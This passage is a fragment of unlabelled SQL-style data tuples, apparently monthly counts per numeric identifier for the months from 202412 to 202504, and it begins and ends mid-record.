2',3),(3034,2,'202412',3),(3090,2,'202412',3),(3109,2,'202412',3),(3253,2,'202412',3),(3259,2,'202412',3),(3275,2,'202412',3),(3290,2,'202412',3),(3738,2,'202412',3),(4408,2,'202412',3),(4566,2,'202412',3),(4648,2,'202412',3),(4654,2,'202412',3),(4660,2,'202412',3),(4697,2,'202412',3),(4771,2,'202412',3),(5020,2,'202412',3),(5024,2,'202412',3),(5071,2,'202412',3),(5131,2,'202412',3),(5146,2,'202412',3),(5248,2,'202412',3),(5304,2,'202412',3),(5356,2,'202412',3),(102,2,'202412',4),(468,2,'202412',4),(473,2,'202412',4),(487,2,'202412',4),(488,2,'202412',4),(1590,2,'202412',4),(1614,2,'202412',4),(1707,2,'202412',4),(1722,2,'202412',4),(1734,2,'202412',4),(2150,2,'202412',4),(2154,2,'202412',4),(2297,2,'202412',4),(2503,2,'202412',4),(2775,2,'202412',4),(2813,2,'202412',4),(2993,2,'202412',4),(3096,2,'202412',4),(3102,2,'202412',4),(3104,2,'202412',4),(3226,2,'202412',4),(3245,2,'202412',4),(3265,2,'202412',4),(3316,2,'202412',4),(3534,2,'202412',4),(3724,2,'202412',4),(4382,2,'202412',4),(4391,2,'202412',4),(4457,2,'202412',4),(4517,2,'202412',4),(4677,2,'202412',4),(4722,2,'202412',4),(4930,2,'202412',4),(5050,2,'202412',4),(72,2,'202412',5),(74,2,'202412',5),(335,2,'202412',5),(472,2,'202412',5),(1600,2,'202412',5),(1730,2,'202412',5),(2178,2,'202412',5),(2748,2,'202412',5),(2964,2,'202412',5),(3041,2,'202412',5),(3124,2,'202412',5),(3243,2,'202412',5),(4301,2,'202412',5),(4373,2,'202412',5),(4396,2,'202412',5),(4412,2,'202412',5),(4694,2,'202412',5),(4996,2,'202412',5),(5163,2,'202412',5),(5330,2,'202412',5),(5374,2,'202412',5),(76,2,'202412',6),(476,2,'202412',6),(1701,2,'202412',6),(1703,2,'202412',6),(2704,2,'202412',6),(3038,2,'202412',6),(3066,2,'202412',6),(4341,2,'202412',6),(5264,2,'202412',6),(87,2,'202412',7),(470,2,'202412',7),(478,2,'202412',7),(1726,2,'202412',7),(2309,2,'202412',7),(3023,2,'202412',7),(3489,2,'202412',7),(3764,2,'202412',7),(4368,2,'202412',7),(4759,2,'202412',7),(4866,2,'202412',7),(1588,2,'202412',8),(1610,2,'202412',8),(2161,2,'202412',8),(3030,2,'202412',8),(1584,2,'202412',9),(1592,2,'202412',9),(1596,2,'202412',9),(4357,2,'202412',9),(1594,2,'202412',10),(1766,2,'202412',12),(2148,2,'202412',12),(4420,2,'202412',12),(5076,2,'202412',13),(1612,2,'202412',14),(2904,2,'202412',15),(1586,2,'202412',16),(1602,2,'202412',16),(1770,2,'202412',16),(2751,2,'202412',18),(3261,2,'202412',18),(4776,2,'202412',18),(1745,2,'202412',19),(3263,2,'202412',19),(4363,2,'202412',19),(1598,2,'202412',20),(2165,2,'202412',20),(1732,2,'202412',21),(1728,2,'202412',22),(2457,2,'202412',22),(2658,2,'202412',22),(3079,2,'202412',22),(3097,2,'202412',22),(1699,2,'202412',24),(1749,2,'202412',24),(3117,2,'202412',24),(1772,2,'202412',25),(1780,2,'202412',25),(4542,2,'202412',25),(1743,2,'202412',27),(3092,2,'202412',32),(1724,2,'202412',34),(3060,2,'202412',35),(1544,2,'202412',38),(1582,2,'202412',39),(3781,2,'202412',39),(3247,2,'202412',135),(68,2,'202412',141),(80,2,'202412',177),(9,2,'202412',73608),(74,2,'202501',1),(91,2,'202501',1),(102,2,'202501',1),(108,2,'202501',1),(467,2,'202501',1),(468,2,'202501',1),(1592,2,'202501',1),(1705,2,'202501',1),(1709,2,'202501',1),(1718,2,'202501',1),(1747,2,'202501',1),(1778,2,'202501',1),(3041,2,'202501',1),(3072,2,'202501',1),(3240,2,'202501',1),(3251,2,'202501',1),(3265,2,'202501',1),(3271,2,'202501',1),(3531,2,'202501',1),(3721,2,'202501',1),(3731,2,'202501',1),(3738,2,'202501',1),(3771,2,'202501',1),(4387,2,'202501',1),(4404,2,'202501',1),(4424,2,'202501',1),(4454,2,'202501',1),(4514,2,'202501',1),(4517,2,'202501',1),(4520,2,'202501',1),(4529,2,'202501',1),(4551,2,'202501',1),(4582,2,'202501',1),(4587,2,'202501',1),(4591,2,'202501',1),(4648,2,'202501',1),(4654,2,'202501',1),(4668,2,'202501',1),(4674,2,'202501',1),(4685,2,'202501',1),(4688,2,'202501',1),(4703,2,'202501',1),(4709,2,'202501',1),(4712,2,'202501',1),(4747,2,'202501',1),(4753,2,'202501',1),(4762,2,'202501',1),(4768,2,'202501',1),(4792,2,'202501',1),(4797,2,'202501',1),(4858,2,'202501',1),(4874,2,'202501',1),(4883,2,'202501',1),(4888,2,'202501',1),(4893,2,'202501',1),(4930,2,'202501',1),(4976,2,'202501',1),(4983,2,'202501',1),(4996,2,'202501',1),(5028,2,'202501',1),(5037,2,'202501',1),(5050,2,'202501',1),(5080,2,'202501',1),(5101,2,'202501',1),(5122,2,'202501',1),(5134,2,'202501',1),(5137,2,'202501',1),(5146,2,'202501',1),(5253,2,'202501',1),(5256,2,'202501',1),(5264,2,'202501',1),(5276,2,'202501',1),(5289,2,'202501',1),(5307,2,'202501',1),(5310,2,'202501',1),(5320,2,'202501',1),(5330,2,'202501',1),(5359,2,'202501',1),(5363,2,'202501',1),(470,2,'202501',2),(473,2,'202501',2),(476,2,'202501',2),(479,2,'202501',2),(488,2,'202501',2),(1697,2,'202501',2),(1701,2,'202501',2),(1713,2,'202501',2),(1722,2,'202501',2),(1768,2,'202501',2),(2150,2,'202501',2),(2152,2,'202501',2),(2769,2,'202501',2),(2809,2,'202501',2),(2911,2,'202501',2),(3066,2,'202501',2),(3107,2,'202501',2),(3127,2,'202501',2),(3249,2,'202501',2),(3278,2,'202501',2),(3482,2,'202501',2),(3727,2,'202501',2),(3746,2,'202501',2),(3777,2,'202501',2),(4238,2,'202501',2),(4275,2,'202501',2),(4329,2,'202501',2),(4341,2,'202501',2),(4377,2,'202501',2),(4408,2,'202501',2),(4448,2,'202501',2),(4546,2,'202501',2),(4556,2,'202501',2),(4660,2,'202501',2),(4663,2,'202501',2),(4706,2,'202501',2),(4744,2,'202501',2),(4765,2,'202501',2),(4870,2,'202501',2),(4897,2,'202501',2),(4977,2,'202501',2),(4988,2,'202501',2),(5067,2,'202501',2),(5125,2,'202501',2),(5140,2,'202501',2),(5153,2,'202501',2),(5163,2,'202501',2),(5280,2,'202501',2),(5292,2,'202501',2),(5314,2,'202501',2),(5317,2,'202501',2),(5356,2,'202501',2),(5383,2,'202501',2),(471,2,'202501',3),(477,2,'202501',3),(480,2,'202501',3),(483,2,'202501',3),(485,2,'202501',3),(570,2,'202501',3),(1584,2,'202501',3),(1606,2,'202501',3),(1608,2,'202501',3),(1707,2,'202501',3),(1715,2,'202501',3),(1726,2,'202501',3),(1737,2,'202501',3),(1774,2,'202501',3),(2063,2,'202501',3),(2503,2,'202501',3),(2804,2,'202501',3),(2991,2,'202501',3),(3038,2,'202501',3),(3090,2,'202501',3),(3097,2,'202501',3),(3124,2,'202501',3),(3243,2,'202501',3),(3280,2,'202501',3),(3313,2,'202501',3),(3316,2,'202501',3),(3489,2,'202501',3),(3534,2,'202501',3),(4301,2,'202501',3),(4332,2,'202501',3),(4335,2,'202501',3),(4338,2,'202501',3),(4391,2,'202501',3),(4400,2,'202501',3),(4440,2,'202501',3),(4444,2,'202501',3),(4457,2,'202501',3),(4524,2,'202501',3),(4612,2,'202501',3),(4645,2,'202501',3),(4651,2,'202501',3),(4677,2,'202501',3),(4691,2,'202501',3),(4694,2,'202501',3),(5033,2,'202501',3),(5046,2,'202501',3),(5058,2,'202501',3),(5071,2,'202501',3),(5128,2,'202501',3),(5157,2,'202501',3),(5295,2,'202501',3),(5353,2,'202501',3),(76,2,'202501',4),(87,2,'202501',4),(335,2,'202501',4),(472,2,'202501',4),(482,2,'202501',4),(486,2,'202501',4),(487,2,'202501',4),(1604,2,'202501',4),(1699,2,'202501',4),(1703,2,'202501',4),(1711,2,'202501',4),(1734,2,'202501',4),(1745,2,'202501',4),(2154,2,'202501',4),(2156,2,'202501',4),(2297,2,'202501',4),(2558,2,'202501',4),(2658,2,'202501',4),(2704,2,'202501',4),(2748,2,'202501',4),(2801,2,'202501',4),(2813,2,'202501',4),(2964,2,'202501',4),(3069,2,'202501',4),(3096,2,'202501',4),(3117,2,'202501',4),(3229,2,'202501',4),(3273,2,'202501',4),(3498,2,'202501',4),(3541,2,'202501',4),(3710,2,'202501',4),(3714,2,'202501',4),(4396,2,'202501',4),(4566,2,'202501',4),(4608,2,'202501',4),(4657,2,'202501',4),(4697,2,'202501',4),(5042,2,'202501',4),(5271,2,'202501',4),(72,2,'202501',5),(1590,2,'202501',5),(1695,2,'202501',5),(1732,2,'202501',5),(1782,2,'202501',5),(2178,2,'202501',5),(2293,2,'202501',5),(2296,2,'202501',5),(3006,2,'202501',5),(3079,2,'202501',5),(3102,2,'202501',5),(3104,2,'202501',5),(3245,2,'202501',5),(3257,2,'202501',5),(3282,2,'202501',5),(3285,2,'202501',5),(3290,2,'202501',5),(3742,2,'202501',5),(3749,2,'202501',5),(4428,2,'202501',5),(4432,2,'202501',5),(4759,2,'202501',5),(5301,2,'202501',5),(5304,2,'202501',5),(89,2,'202501',6),(469,2,'202501',6),(478,2,'202501',6),(484,2,'202501',6),(1610,2,'202501',6),(1730,2,'202501',6),(1776,2,'202501',6),(2159,2,'202501',6),(2161,2,'202501',6),(2252,2,'202501',6),(2457,2,'202501',6),(2775,2,'202501',6),(3027,2,'202501',6),(3063,2,'202501',6),(3261,2,'202501',6),(3307,2,'202501',6),(4412,2,'202501',6),(4722,2,'202501',6),(4750,2,'202501',6),(1594,2,'202501',7),(1596,2,'202501',7),(1770,2,'202501',7),(2609,2,'202501',7),(3004,2,'202501',7),(3263,2,'202501',7),(3287,2,'202501',7),(4542,2,'202501',7),(1743,2,'202501',8),(2751,2,'202501',8),(2965,2,'202501',8),(2989,2,'202501',8),(3030,2,'202501',8),(3226,2,'202501',8),(4363,2,'202501',8),(4420,2,'202501',8),(4436,2,'202501',8),(4776,2,'202501',8),(1614,2,'202501',9),(1720,2,'202501',9),(1749,2,'202501',9),(2309,2,'202501',9),(3034,2,'202501',9),(3109,2,'202501',9),(4416,2,'202501',9),(481,2,'202501',10),(1588,2,'202501',10),(1600,2,'202501',10),(1766,2,'202501',10),(3005,2,'202501',10),(3083,2,'202501',10),(3092,2,'202501',10),(3764,2,'202501',10),(4866,2,'202501',10),(2904,2,'202501',11),(1728,2,'202501',12),(2165,2,'202501',12),(1772,2,'202501',14),(1612,2,'202501',15),(1724,2,'202501',15),(1586,2,'202501',16),(1780,2,'202501',17),(1598,2,'202501',20),(5076,2,'202501',20),(1602,2,'202501',21),(1582,2,'202501',23),(2148,2,'202501',23),(1544,2,'202501',24),(3060,2,'202501',24),(3781,2,'202501',60),(68,2,'202501',131),(3247,2,'202501',144),(80,2,'202501',145),(9,2,'202501',75480),(91,2,'202502',1),(106,2,'202502',1),(110,2,'202502',1),(1606,2,'202502',1),(1697,2,'202502',1),(1699,2,'202502',1),(1720,2,'202502',1),(1730,2,'202502',1),(1741,2,'202502',1),(1780,2,'202502',1),(2156,2,'202502',1),(2248,2,'202502',1),(2965,2,'202502',1),(3240,2,'202502',1),(3259,2,'202502',1),(3263,2,'202502',1),(3313,2,'202502',1),(3541,2,'202502',1),(3721,2,'202502',1),(3724,2,'202502',1),(3727,2,'202502',1),(3731,2,'202502',1),(3752,2,'202502',1),(3774,2,'202502',1),(3777,2,'202502',1),(4275,2,'202502',1),(4323,2,'202502',1),(4335,2,'202502',1),(4400,2,'202502',1),(4520,2,'202502',1),(4645,2,'202502',1),(4648,2,'202502',1),(4654,2,'202502',1),(4681,2,'202502',1),(4697,2,'202502',1),(4703,2,'202502',1),(4709,2,'202502',1),(4756,2,'202502',1),(4762,2,'202502',1),(4858,2,'202502',1),(4870,2,'202502',1),(4888,2,'202502',1),(4893,2,'202502',1),(4977,2,'202502',1),(5028,2,'202502',1),(5042,2,'202502',1),(5058,2,'202502',1),(5062,2,'202502',1),(5128,2,'202502',1),(5295,2,'202502',1),(5326,2,'202502',1),(5359,2,'202502',1),(5363,2,'202502',1),(5378,2,'202502',1),(76,2,'202502',2),(335,2,'202502',2),(485,2,'202502',2),(486,2,'202502',2),(1592,2,'202502',2),(1707,2,'202502',2),(1747,2,'202502',2),(1782,2,'202502',2),(2063,2,'202502',2),(2152,2,'202502',2),(2178,2,'202502',2),(2296,2,'202502',2),(2503,2,'202502',2),(2558,2,'202502',2),(3027,2,'202502',2),(3072,2,'202502',2),(3079,2,'202502',2),(3109,2,'202502',2),(3127,2,'202502',2),(3229,2,'202502',2),(3249,2,'202502',2),(3479,2,'202502',2),(3482,2,'202502',2),(3710,2,'202502',2),(3742,2,'202502',2),(3771,2,'202502',2),(4301,2,'202502',2),(4382,2,'202502',2),(4428,2,'202502',2),(4514,2,'202502',2),(4529,2,'202502',2),(4582,2,'202502',2),(4587,2,'202502',2),(4591,2,'202502',2),(4608,2,'202502',2),(4651,2,'202502',2),(4657,2,'202502',2),(4660,2,'202502',2),(4677,2,'202502',2),(4688,2,'202502',2),(4694,2,'202502',2),(4744,2,'202502',2),(4750,2,'202502',2),(4753,2,'202502',2),(4765,2,'202502',2),(4874,2,'202502',2),(4897,2,'202502',2),(5101,2,'202502',2),(5125,2,'202502',2),(5131,2,'202502',2),(5134,2,'202502',2),(5276,2,'202502',2),(5280,2,'202502',2),(5298,2,'202502',2),(5307,2,'202502',2),(5310,2,'202502',2),(5317,2,'202502',2),(5320,2,'202502',2),(5323,2,'202502',2),(5330,2,'202502',2),(74,2,'202502',3),(467,2,'202502',3),(478,2,'202502',3),(488,2,'202502',3),(1588,2,'202502',3),(1590,2,'202502',3),(1610,2,'202502',3),(1705,2,'202502',3),(1709,2,'202502',3),(2154,2,'202502',3),(2252,2,'202502',3),(2617,2,'202502',3),(2813,2,'202502',3),(2956,2,'202502',3),(2991,2,'202502',3),(3004,2,'202502',3),(3006,2,'202502',3),(3034,2,'202502',3),(3045,2,'202502',3),(3083,2,'202502',3),(3087,2,'202502',3),(3251,2,'202502',3),(3257,2,'202502',3),(3498,2,'202502',3),(4326,2,'202502',3),(4332,2,'202502',3),(4368,2,'202502',3),(4373,2,'202502',3),(4432,2,'202502',3),(4436,2,'202502',3),(4546,2,'202502',3),(4551,2,'202502',3),(4668,2,'202502',3),(4674,2,'202502',3),(4712,2,'202502',3),(4741,2,'202502',3),(4797,2,'202502',3),(4862,2,'202502',3),(4930,2,'202502',3),(4980,2,'202502',3),(4996,2,'202502',3),(5020,2,'202502',3),(5033,2,'202502',3),(5037,2,'202502',3),(5264,2,'202502',3),(5268,2,'202502',3),(5314,2,'202502',3),(5353,2,'202502',3),(5356,2,'202502',3),(84,2,'202502',4),(102,2,'202502',4),(474,2,'202502',4),(476,2,'202502',4),(477,2,'202502',4),(482,2,'202502',4),(1737,2,'202502',4),(1751,2,'202502',4),(1778,2,'202502',4),(2293,2,'202502',4),(2457,2,'202502',4),(2801,2,'202502',4),(2911,2,'202502',4),(2993,2,'202502',4),(3030,2,'202502',4),(3063,2,'202502',4),(3066,2,'202502',4),(3097,2,'202502',4),(3104,2,'202502',4),(3226,2,'202502',4),(3253,2,'202502',4),(3261,2,'202502',4),(3267,2,'202502',4),(3275,2,'202502',4),(3280,2,'202502',4),(3285,2,'202502',4),(3307,2,'202502',4),(3316,2,'202502',4),(3438,2,'202502',4),(3486,2,'202502',4),(3531,2,'202502',4),(3534,2,'202502',4),(3714,2,'202502',4),(3746,2,'202502',4),(4357,2,'202502',4),(4396,2,'202502',4),(4404,2,'202502',4),(4448,2,'202502',4),(4517,2,'202502',4),(4542,2,'202502',4),(4691,2,'202502',4),(4700,2,'202502',4),(4988,2,'202502',4),(5137,2,'202502',4),(5153,2,'202502',4),(5163,2,'202502',4),(5256,2,'202502',4),(5304,2,'202502',4),(471,2,'202502',5),(480,2,'202502',5),(481,2,'202502',5),(1614,2,'202502',5),(1713,2,'202502',5),(1718,2,'202502',5),(1749,2,'202502',5),(1772,2,'202502',5),(1774,2,'202502',5),(1776,2,'202502',5),(2150,2,'202502',5),(2297,2,'202502',5),(2964,2,'202502',5),(2989,2,'202502',5),(3005,2,'202502',5),(3041,2,'202502',5),(3069,2,'202502',5),(3090,2,'202502',5),(3092,2,'202502',5),(3096,2,'202502',5),(3265,2,'202502',5),(3273,2,'202502',5),(3297,2,'202502',5),(3489,2,'202502',5),(3738,2,'202502',5),(4341,2,'202502',5),(4387,2,'202502',5),(4444,2,'202502',5),(4457,2,'202502',5),(4524,2,'202502',5),(4771,2,'202502',5),(5024,2,'202502',5),(5046,2,'202502',5),(5054,2,'202502',5),(5140,2,'202502',5),(5146,2,'202502',5),(469,2,'202502',6),(479,2,'202502',6),(483,2,'202502',6),(484,2,'202502',6),(1584,2,'202502',6),(1608,2,'202502',6),(1695,2,'202502',6),(1701,2,'202502',6),(1745,2,'202502',6),(2159,2,'202502',6),(2609,2,'202502',6),(2775,2,'202502',6),(3243,2,'202502',6),(3245,2,'202502',6),(3271,2,'202502',6),(3735,2,'202502',6),(4238,2,'202502',6),(4391,2,'202502',6),(4408,2,'202502',6),(4454,2,'202502',6),(4612,2,'202502',6),(4747,2,'202502',6),(4759,2,'202502',6),(4866,2,'202502',6),(5253,2,'202502',6),(5259,2,'202502',6),(5271,2,'202502',6),(5334,2,'202502',6),(87,2,'202502',7),(472,2,'202502',7),(1594,2,'202502',7),(1604,2,'202502',7),(1703,2,'202502',7),(1715,2,'202502',7),(1726,2,'202502',7),(1728,2,'202502',7),(2751,2,'202502',7),(2809,2,'202502',7),(3278,2,'202502',7),(3764,2,'202502',7),(4420,2,'202502',7),(4556,2,'202502',7),(4566,2,'202502',7),(4722,2,'202502',7),(4768,2,'202502',7),(4976,2,'202502',7),(5071,2,'202502',7),(5301,2,'202502',7),(473,2,'202502',8),(1612,2,'202502',8),(1732,2,'202502',8),(2148,2,'202502',8),(2658,2,'202502',8),(3102,2,'202502',8),(3287,2,'202502',8),(4338,2,'202502',8),(5080,2,'202502',8),(5157,2,'202502',8),(72,2,'202502',9),(89,2,'202502',9),(470,2,'202502',9),(487,2,'202502',9),(1596,2,'202502',9),(1734,2,'202502',9),(2704,2,'202502',9),(3023,2,'202502',9),(3038,2,'202502',9),(3117,2,'202502',9),(3282,2,'202502',9),(3290,2,'202502',9),(4412,2,'202502',9),(5067,2,'202502',9),(5248,2,'202502',9),(2769,2,'202502',10),(2904,2,'202502',10),(3107,2,'202502',10),(1711,2,'202502',11),(1770,2,'202502',11),(3124,2,'202502',11),(4776,2,'202502',11),(1722,2,'202502',12),(1766,2,'202502',12),(2161,2,'202502',12),(468,2,'202502',13),(1598,2,'202502',13),(1724,2,'202502',13),(2165,2,'202502',13),(2309,2,'202502',13),(4706,2,'202502',13),(4363,2,'202502',14),(4416,2,'202502',14),(570,2,'202502',15),(1602,2,'202502',15),(5076,2,'202502',15),(1600,2,'202502',16),(1544,2,'202502',20),(1743,2,'202502',22),(1582,2,'202502',31),(3060,2,'202502',34),(1586,2,'202502',36),(5289,2,'202502',43),(3781,2,'202502',63),(3247,2,'202502',74),(80,2,'202502',135),(68,2,'202502',146),(9,2,'202502',72506),(4587,2,'202503',1),(5383,2,'202503',1),(2063,2,'202503',2),(3297,2,'202503',2),(3721,2,'202503',2),(3749,2,'202503',2),(4326,2,'202503',2),(4591,2,'202503',2),(4700,2,'202503',2),(4706,2,'202503',2),(4765,2,'202503',2),(4858,2,'202503',2),(4874,2,'202503',2),(4878,2,'202503',2),(5363,2,'202503',2),(5378,2,'202503',2),(469,2,'202503',3),(479,2,'202503',3),(1741,2,'202503',3),(1776,2,'202503',3),(3102,2,'202503',3),(3727,2,'202503',3),(3738,2,'202503',3),(3774,2,'202503',3),(4238,2,'202503',3),(4275,2,'202503',3),(4440,2,'202503',3),(4520,2,'202503',3),(4546,2,'202503',3),(4612,2,'202503',3),(4660,2,'202503',3),(4685,2,'202503',3),(4747,2,'202503',3),(4888,2,'202503',3),(4930,2,'202503',3),(4983,2,'202503',3),(5062,2,'202503',3),(5320,2,'202503',3),(5326,2,'202503',3),(5374,2,'202503',3),(480,2,'202503',4),(2748,2,'202503',4),(2775,2,'202503',4),(2804,2,'202503',4),(2993,2,'202503',4),(3249,2,'202503',4),(3430,2,'202503',4),(3479,2,'202503',4),(3714,2,'202503',4),(3724,2,'202503',4),(3771,2,'202503',4),(3777,2,'202503',4),(4338,2,'202503',4),(4357,2,'202503',4),(4373,2,'202503',4),(4377,2,'202503',4),(4424,2,'202503',4),(4444,2,'202503',4),(4566,2,'202503',4),(4654,2,'202503',4),(4677,2,'202503',4),(4703,2,'202503',4),(4771,2,'202503',4),(4797,2,'202503',4),(4870,2,'202503',4),(4883,2,'202503',4),(4897,2,'202503',4),(4980,2,'202503',4),(5033,2,'202503',4),(5146,2,'202503',4),(5248,2,'202503',4),(5276,2,'202503',4),(5310,2,'202503',4),(102,2,'202503',5),(483,2,'202503',5),(1697,2,'202503',5),(1734,2,'202503',5),(1780,2,'202503',5),(3107,2,'202503',5),(3109,2,'202503',5),(3127,2,'202503',5),(3285,2,'202503',5),(3486,2,'202503',5),(4332,2,'202503',5),(4400,2,'202503',5),(4436,2,'202503',5),(4514,2,'202503',5),(4651,2,'202503',5),(4697,2,'202503',5),(4722,2,'202503',5),(4741,2,'202503',5),(4756,2,'202503',5),(4862,2,'202503',5),(4977,2,'202503',5),(5046,2,'202503',5),(5050,2,'202503',5),(5054,2,'202503',5),(5058,2,'202503',5),(5125,2,'202503',5),(5137,2,'202503',5),(5253,2,'202503',5),(5256,2,'202503',5),(5289,2,'202503',5),(5314,2,'202503',5),(5356,2,'202503',5),(74,2,'202503',6),(1590,2,'202503',6),(1610,2,'202503',6),(1715,2,'202503',6),(2296,2,'202503',6),(2964,2,'202503',6),(3069,2,'202503',6),(3104,2,'202503',6),(3259,2,'202503',6),(3489,2,'202503',6),(3534,2,'202503',6),(3735,2,'202503',6),(4542,2,'202503',6),(4556,2,'202503',6),(4608,2,'202503',6),(4893,2,'202503',6),(1695,2,'202503',7),(1707,2,'202503',7),(1720,2,'202503',7),(2148,2,'202503',7),(2150,2,'202503',7),(3245,2,'202503',7),(3257,2,'202503',7),(3271,2,'202503',7),(3282,2,'202503',7),(3731,2,'202503',7),(4301,2,'202503',7),(4428,2,'202503',7),(4448,2,'202503',7),(4457,2,'202503',7),(4524,2,'202503',7),(4674,2,'202503',7),(4691,2,'202503',7),(4792,2,'202503',7),(5067,2,'202503',7),(5280,2,'202503',7),(5298,2,'202503',7),(5307,2,'202503',7),(5359,2,'202503',7),(467,2,'202503',8),(477,2,'202503',8),(488,2,'202503',8),(1594,2,'202503',8),(1604,2,'202503',8),(1703,2,'202503',8),(1737,2,'202503',8),(2293,2,'202503',8),(2965,2,'202503',8),(2991,2,'202503',8),(3316,2,'202503',8),(4391,2,'202503',8),(5042,2,'202503',8),(5163,2,'202503',8),(5301,2,'202503',8),(76,2,'202503',9),(482,2,'202503',9),(1709,2,'202503',9),(1718,2,'202503',9),(1726,2,'202503',9),(1728,2,'202503',9),(1732,2,'202503',9),(2248,2,'202503',9),(3030,2,'202503',9),(3083,2,'202503',9),(3226,2,'202503',9),(3273,2,'202503',9),(3307,2,'202503',9),(5024,2,'202503',9),(5122,2,'202503',9),(487,2,'202503',10),(1768,2,'202503',10),(1770,2,'202503',10),(2154,2,'202503',10),(3045,2,'202503',10),(3087,2,'202503',10),(3124,2,'202503',10),(106,2,'202503',11),(1598,2,'202503',11),(1612,2,'202503',11),(1743,2,'202503',11),(3004,2,'202503',11),(3038,2,'202503',11),(4529,2,'202503',11),(4866,2,'202503',11),(4988,2,'202503',11),(485,2,'202503',12),(1699,2,'202503',12),(1745,2,'202503',12),(1782,2,'202503',12),(2297,2,'202503',12),(2457,2,'202503',12),(3251,2,'202503',12),(3764,2,'202503',12),(4363,2,'202503',12),(4744,2,'202503',12),(5268,2,'202503',12),(470,2,'202503',13),(2161,2,'202503',13),(3090,2,'202503',13),(4341,2,'202503',13),(4657,2,'202503',13),(4753,2,'202503',13),(5131,2,'202503',13),(5295,2,'202503',13),(5323,2,'202503',13),(84,2,'202503',14),(1778,2,'202503',14),(2165,2,'202503',14),(2704,2,'202503',14),(2769,2,'202503',14),(3243,2,'202503',14),(3253,2,'202503',14),(3267,2,'202503',14),(3269,2,'202503',14),(3280,2,'202503',14),(3746,2,'202503',14),(3752,2,'202503',14),(4454,2,'202503',14),(4582,2,'202503',14),(4688,2,'202503',14),(4750,2,'202503',14),(4762,2,'202503',14),(5317,2,'202503',14),(110,2,'202503',15),(1592,2,'202503',15),(1722,2,'202503',15),(2156,2,'202503',15),(2904,2,'202503',15),(3027,2,'202503',15),(3034,2,'202503',15),(3072,2,'202503',15),(3092,2,'202503',15),(3096,2,'202503',15),(3263,2,'202503',15),(3290,2,'202503',15),(3438,2,'202503',15),(3482,2,'202503',15),(3531,2,'202503',15),(3742,2,'202503',15),(4335,2,'202503',15),(4387,2,'202503',15),(4663,2,'202503',15),(4681,2,'202503',15),(4694,2,'202503',15),(5071,2,'202503',15),(5080,2,'202503',15),(5153,2,'202503',15),(5264,2,'202503',15),(5353,2,'202503',15),(87,2,'202503',16),(108,2,'202503',16),(1705,2,'202503',16),(1739,2,'202503',16),(1747,2,'202503',16),(2152,2,'202503',16),(2558,2,'202503',16),(3063,2,'202503',16),(3229,2,'202503',16),(3275,2,'202503',16),(3278,2,'202503',16),(3541,2,'202503',16),(4323,2,'202503',16),(4396,2,'202503',16),(4404,2,'202503',16),(4412,2,'202503',16),(4420,2,'202503',16),(4517,2,'202503',16),(4709,2,'202503',16),(5020,2,'202503',16),(5271,2,'202503',16),(5304,2,'202503',16),(91,2,'202503',17),(1701,2,'202503',17),(1751,2,'202503',17),(3006,2,'202503',17),(3261,2,'202503',17),(4329,2,'202503',17),(4368,2,'202503',17),(4645,2,'202503',17),(4648,2,'202503',17),(5128,2,'202503',17),(5134,2,'202503',17),(5140,2,'202503',17),(474,2,'202503',18),(476,2,'202503',18),(486,2,'202503',18),(1596,2,'202503',18),(1749,2,'202503',18),(1774,2,'202503',18),(2159,2,'202503',18),(2617,2,'202503',18),(2658,2,'202503',18),(2911,2,'202503',18),(2956,2,'202503',18),(2989,2,'202503',18),(3117,2,'202503',18),(3287,2,'202503',18),(3313,2,'202503',18),(3710,2,'202503',18),(4416,2,'202503',18),(4551,2,'202503',18),(4712,2,'202503',18),(4759,2,'202503',18),(5101,2,'202503',18),(5157,2,'202503',18),(5330,2,'202503',18),(472,2,'202503',19),(570,2,'202503',19),(1713,2,'202503',19),(2809,2,'202503',19),(3066,2,'202503',19),(3498,2,'202503',19),(4382,2,'202503',19),(4432,2,'202503',19),(4668,2,'202503',19),(4768,2,'202503',19),(5334,2,'202503',19),(471,2,'202503',20),(484,2,'202503',20),(1730,2,'202503',20),(2178,2,'202503',20),(2252,2,'202503',20),(2503,2,'202503',20),(3023,2,'202503',20),(4802,2,'202503',20),(4976,2,'202503',20),(5028,2,'202503',20),(5037,2,'202503',20),(5259,2,'202503',20),(481,2,'202503',21),(3005,2,'202503',21),(3097,2,'202503',21),(3265,2,'202503',21),(478,2,'202503',22),(1544,2,'202503',22),(1608,2,'202503',22),(1711,2,'202503',22),(3079,2,'202503',22),(4408,2,'202503',22),(4996,2,'202503',22),(1588,2,'202503',23),(1766,2,'202503',23),(1772,2,'202503',23),(3041,2,'202503',23),(4776,2,'202503',23),(335,2,'202503',24),(468,2,'202503',24),(1584,2,'202503',24),(1614,2,'202503',24),(1724,2,'202503',24),(2801,2,'202503',24),(3240,2,'202503',24),(89,2,'202503',26),(473,2,'202503',26),(1582,2,'202503',26),(1606,2,'202503',26),(2609,2,'202503',27),(5292,2,'202503',27),(1600,2,'202503',28),(1602,2,'202503',29),(2309,2,'202503',31),(5076,2,'202503',31),(2751,2,'202503',32),(3247,2,'202503',36),(2813,2,'202503',39),(1586,2,'202503',40),(3060,2,'202503',47),(72,2,'202503',64),(3781,2,'202503',80),(68,2,'202503',123),(80,2,'202503',139),(9,2,'202503',136871),(1590,2,'202504',1),(1768,2,'202504',1),(2063,2,'202504',1),(2150,2,'202504',1),(2296,2,'202504',1),(2964,2,'202504',1),(3102,2,'202504',1),(3297,2,'202504',1),(4444,2,'202504',1),(4448,2,'202504',1),(4546,2,'202504',1),(4654,2,'202504',1),(4977,2,'202504',1),(5050,2,'202504',1),(5067,2,'202504',1),(5122,2,'202504',1),(5163,2,'202504',1),(5326,2,'202504',1),(5378,2,'202504',1),(5383,2,'202504',1),(1697,2,'202504',2),(1707,2,'202504',2),(1720,2,'202504',2),(1741,2,'202504',2),(1745,2,'202504',2),(2156,2,'202504',2),(2704,2,'202504',2),(3038,2,'202504',2),(3096,2,'202504',2),(3269,2,'202504',2),(3271,2,'202504',2),(3282,2,'202504',2),(3479,2,'202504',2),(3486,2,'202504',2),(3735,2,'202504',2),(4323,2,'202504',2),(4326,2,'202504',2),(4357,2,'202504',2),(4373,2,'202504',2),(4404,2,'202504',2),(4424,2,'202504',2),(4457,2,'202504',2),(4520,2,'202504',2),(4582,2,'202504',2),(4591,2,'202504',2),(4608,2,'202504',2),(4685,2,'202504',2),(4688,2,'202504',2),(4700,2,'202504',2),(4703,2,'202504',2),(4706,2,'202504',2),(4709,2,'202504',2),(4747,2,'202504',2),(4802,2,'202504',2),(4862,2,'202504',2),(4870,2,'202504',2),(4883,2,'202504',2),(4980,2,'202504',2),(5058,2,'202504',2),(5062,2,'202504',2),(5146,2,'202504',2),(5292,2,'202504',2),(5298,2,'